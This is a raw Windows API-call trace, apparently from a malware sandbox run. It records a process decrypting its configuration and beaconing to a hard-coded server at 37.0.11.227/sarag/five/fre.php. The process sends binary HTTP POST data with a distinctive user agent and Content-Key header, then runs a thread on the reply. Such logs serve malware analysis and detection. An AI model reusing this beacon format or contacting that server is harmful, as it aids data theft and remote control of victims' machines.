[0311.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.099] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.100] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.100] GetProcessHeap () returned 0x690000 [0311.100] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0311.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.101] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0311.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.102] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0311.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.103] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0311.103] GetProcessHeap () returned 0x690000 [0311.103] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0311.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.104] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0311.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.104] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0311.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.105] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0311.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.106] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0311.106] GetProcessHeap () returned 0x690000 [0311.106] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0311.106] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0311.106] GetProcessHeap () returned 0x690000 [0311.106] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0311.106] socket (af=2, type=1, protocol=6) returned 0xa74 [0311.106] connect (s=0xa74, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0311.132] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0311.132] GetProcessHeap () returned 0x690000 [0311.132] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0311.132] GetProcessHeap () returned 0x690000 [0311.132] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0311.132] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0311.133] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0311.133] GetProcessHeap () returned 0x690000 [0311.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0311.133] GetProcessHeap () returned 0x690000 [0311.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0311.134] GetProcessHeap () returned 0x690000 [0311.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0311.134] GetProcessHeap () returned 0x690000 [0311.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0311.134] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0311.135] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0311.135] GetProcessHeap () returned 0x690000 [0311.135] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0311.135] GetProcessHeap () returned 0x690000 [0311.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0311.136] send (s=0xa74, buf=0x6ad508*, len=242, flags=0) returned 242 [0311.136] send (s=0xa74, buf=0x6aba40*, len=159, flags=0) returned 159 [0311.136] GetProcessHeap () returned 0x690000 [0311.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0311.136] recv (in: s=0xa74, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0311.214] GetProcessHeap () returned 0x690000 [0311.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0311.215] GetProcessHeap () returned 0x690000 [0311.215] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0311.215] GetProcessHeap () returned 0x690000 [0311.216] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0311.216] GetProcessHeap () returned 0x690000 [0311.216] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0311.216] closesocket (s=0xa74) returned 0 [0311.216] GetProcessHeap () returned 0x690000 [0311.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0311.217] GetProcessHeap () returned 0x690000 [0311.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0311.217] GetProcessHeap () returned 0x690000 [0311.218] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0311.218] GetProcessHeap () returned 0x690000 [0311.218] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0311.218] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16cc) returned 0xa74 [0311.219] Sleep (dwMilliseconds=0xea60) [0311.226] GetProcessHeap () returned 0x690000 [0311.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0311.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.228] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.233] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0311.238] GetProcessHeap () returned 0x690000 [0311.238] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0311.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.239] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0311.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.240] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.241] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.241] GetProcessHeap () returned 0x690000 [0311.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0311.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.244] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0311.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.244] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0311.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.245] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0311.245] GetProcessHeap () returned 0x690000 [0311.245] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0311.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.246] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0311.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.247] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0311.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.248] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0311.249] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.249] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0311.249] GetProcessHeap () returned 0x690000 [0311.249] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0311.249] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0311.249] GetProcessHeap () returned 0x690000 [0311.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0311.249] GetProcessHeap () returned 0x690000 [0311.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0311.250] GetProcessHeap () returned 0x690000 [0311.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0311.250] GetProcessHeap () returned 0x690000 [0311.250] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0311.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.251] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.258] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0311.263] GetProcessHeap () returned 0x690000 [0311.263] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0311.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.264] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0311.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.266] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.267] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.267] GetProcessHeap () returned 0x690000 [0311.267] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0311.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.268] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0311.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.269] CryptDestroyKey (hKey=0x69d628) returned 1 [0311.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.270] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0311.270] GetProcessHeap () returned 0x690000 [0311.270] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0311.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.271] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0311.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.272] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0311.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.272] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0311.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.273] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0311.273] GetProcessHeap () returned 0x690000 [0311.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0311.273] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0311.273] GetProcessHeap () returned 0x690000 [0311.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0311.273] socket (af=2, type=1, protocol=6) returned 0xa78 [0311.273] connect (s=0xa78, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0311.304] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0311.304] GetProcessHeap () returned 0x690000 [0311.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0311.304] GetProcessHeap () returned 0x690000 [0311.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0311.305] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0311.306] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0311.306] GetProcessHeap () returned 0x690000 [0311.306] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0311.306] GetProcessHeap () returned 0x690000 [0311.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0311.306] GetProcessHeap () returned 0x690000 [0311.306] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0311.306] GetProcessHeap () returned 0x690000 [0311.306] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0311.307] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0311.308] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0311.308] GetProcessHeap () returned 0x690000 [0311.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0311.308] GetProcessHeap () returned 0x690000 [0311.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0311.308] send (s=0xa78, buf=0x6ad508*, len=242, flags=0) returned 242 [0311.309] send (s=0xa78, buf=0x6aba40*, len=159, flags=0) returned 159 [0311.309] GetProcessHeap () returned 0x690000 [0311.309] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0311.309] recv (in: s=0xa78, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0311.384] GetProcessHeap () returned 0x690000 [0311.384] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0311.388] GetProcessHeap () returned 0x690000 [0311.388] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0311.388] GetProcessHeap () returned 0x690000 [0311.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0311.389] GetProcessHeap () returned 0x690000 [0311.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0311.389] closesocket (s=0xa78) returned 0 [0311.390] GetProcessHeap () returned 0x690000 [0311.390] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0311.390] GetProcessHeap () returned 0x690000 [0311.390] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0311.391] GetProcessHeap () returned 0x690000 [0311.391] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0311.391] GetProcessHeap () returned 0x690000 [0311.391] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0311.391] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16e4) returned 0xa78 [0311.393] Sleep (dwMilliseconds=0xea60) [0311.394] GetProcessHeap () returned 0x690000 [0311.394] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0311.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.395] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.400] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0311.411] GetProcessHeap () returned 0x690000 [0311.411] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0311.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.412] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0311.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.413] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.413] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.414] GetProcessHeap () returned 0x690000 [0311.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0311.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.415] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0311.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.417] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0311.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.420] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0311.420] GetProcessHeap () returned 0x690000 [0311.420] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0311.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.421] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0311.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.421] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0311.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.422] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0311.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.423] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0311.423] GetProcessHeap () returned 0x690000 [0311.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0311.423] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0311.423] GetProcessHeap () returned 0x690000 [0311.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0311.424] GetProcessHeap () returned 0x690000 [0311.424] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0311.424] GetProcessHeap () returned 0x690000 [0311.425] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0311.427] GetProcessHeap () returned 0x690000 [0311.427] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0311.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.428] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.432] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0311.437] GetProcessHeap () returned 0x690000 [0311.437] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0311.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.438] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0311.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.439] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.441] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.441] GetProcessHeap () returned 0x690000 [0311.442] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0311.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.442] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0311.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.443] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0311.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.444] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0311.444] GetProcessHeap () returned 0x690000 [0311.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0311.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 